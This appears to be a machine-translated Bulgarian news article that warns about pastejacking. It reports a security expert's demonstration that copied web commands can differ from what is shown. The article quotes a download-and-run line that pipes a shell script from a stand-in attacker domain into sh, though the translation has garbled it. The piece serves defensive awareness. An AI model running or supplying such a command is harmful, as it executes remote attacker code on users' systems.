Как копирането и поставянето може да ви създаде повече проблеми, отколкото си мислите

  • Всички копираме и поставяме от интернет ежедневно, без всъщност да знаем рисковете.
  • Експерт по сигурността отдели време, за да покаже на всички най-лошия сценарий, когато прави това.
  • Поставянето на команди, които сте получили от интернет във вашия терминал, е бърз начин да бъдете хакнати
  • Командите, които смятате, че поставяте във вашия терминал, всъщност са злонамерени кодове.
хакер

Вярно е, че живеем в ера, в която скоростта е всичко, а постигането на бързи резултати е всичко, което има значение. Въпреки това, малко хора всъщност спират за секунда и мислят за последствията.

Ежедневно милиони програмисти, администратори и изследователи по сигурността изпълняват прости задачи като копиране и поставяне на команди от уеб страници директно в конзолите на своите компютри.

Въпреки че мнозина дори не се замислят за това, последствията са по-големи и по-опасни, отколкото може да си помислите в началото, особено ако съхранявате чувствителни или ценни данни.

Известен експерт по сигурността отдели време да сподели какво всъщност може да се случи ако копирате и поставите съдържание от уеб страници.

Copy+Paste е лесен начин наистина да бъдете хакнат

Габриел Фридлендър, който е основател на платформата за обучение по сигурността Wizer, свали корицата от схема, която ще ви накара да помислите два пъти, преди да копирате и поставите команди от уеб страници.

Копирането и поставянето на съдържание от интернет стана толкова често срещано в днешно време, че никой дори не се замисля.

Въпреки това Фридлендър предупреждава, че някои уеб страници са по-измамни, отколкото човек може да осъзнае в началото и това, което смятате, че сте копирали от него, е много различно от това, което всъщност сте направили.

И по-лошото във всичко това е, че без необходимите знания или насоки, жертвите осъзнават грешката си едва след поставянето на текста, в който момент вече може да е твърде късно.

Анализаторът по сигурността също измисли малък тест за читателите на своя блог, само за да могат хората да разберат колко лесно е за вас да отворите неволно вратата за киберпрестъпници.

Той предостави команда, която е предназначена за копиране, но истината се разкрива само когато поставите текста и видите какво всъщност сте въвели във вашата настройка.

След като копирате командата, показана на екранната снимка по-горе, резултатът от поставянето й ще ви шокира, тъй като е далеч от това, което сте мислили, че дублирате.

къдрица http://attacker-domain: 8000/shell.sh | ш

Освен напълно различната команда, присъстваща във вашия клипборд, символът за нов ред (или връщане) at краят му означава, че горният пример ще се изпълни веднага след като бъде поставен директно в Linux терминал.

Така че по-добре бъдете по-наясно какво всъщност се случва и третирайте това като сериозна опасност за безопасността. Не казваме, че всички уебсайтове крият злонамерено съдържание, но си струва да вземем това под внимание.

Случвало ли ви се е да сте били хакнати от поставяне на хитри команди във вашия терминал? Споделете своя опит с нас в секцията за коментари по-долу.

Хакът на режима на Бог в Windows може да привлече злонамерени програми

Хакът на режима на Бог в Windows може да привлече злонамерени програмиЗловреден софтуерБожи режим

Има хак на Windows, известен като Бог режим и на пръв поглед може лесно да се повярва, че позволява на хакерите да командват изцяло компютър. Това обаче не е така, тъй като режимът Бог дава възможн...

Прочетете още
Microsoft OneDrive става жертва на злонамерени атаки

Microsoft OneDrive става жертва на злонамерени атакиЗловреден софтуерOnedrive

Според скорошен анализ на Forcepoint Security Labs, Microsoft’s OneDrive защото бизнесът е станал жертва на кибер престъпници и е бил експлоатиран от злонамерен софтуер и фишинг атаки.Базираната на...

Прочетете още
Хакерите използват корекция на Microsoft Office, за да откраднат вашите лични данни

Хакерите използват корекция на Microsoft Office, за да откраднат вашите лични данниЗловреден софтуерMicrosoft Office

Нападателите намериха нов начин във вашия компютър, оставяйки всичките ви данни изложени.Този път гениални киберпрестъпници използваха критична корекция на Microsoft Office.В този непрекъснато нара...

Прочетете още